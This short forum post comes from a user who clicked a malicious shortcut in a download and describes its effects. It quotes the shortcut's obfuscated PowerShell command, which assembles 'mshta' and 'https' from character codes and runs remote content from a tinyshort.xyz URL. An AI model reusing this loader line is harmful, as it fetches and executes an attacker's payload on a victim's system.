Accidentally clicked a Shortcut in a Download..

Accidentally clicked a Shortcut in a Download.. Looks like it was malware doing powershell. Here is what i was able to see in properties though im sure much of the code was parsed: opening from %SYSTEMROOT%System32WindowsPowerShellv1.0 $lo=[string][char[]]@(0x68,0x74,0x74,0x70,0x73) -replace ‘ ‘,”;$wg=[string][char[]]@(0x6d,0x73,0x68,0x74,0x61) -replace ‘ ‘,”;Set-Alias wuy $wg;$lo+=’://tinyshort.xyz/hito’;wuy $lo I see it was replacing data, but can’t really tell what else. I saw a command prompt open and saw that it was able to disable my firewall… but i saw system deny it access a bunch of times too… i feel so stupid…

Read More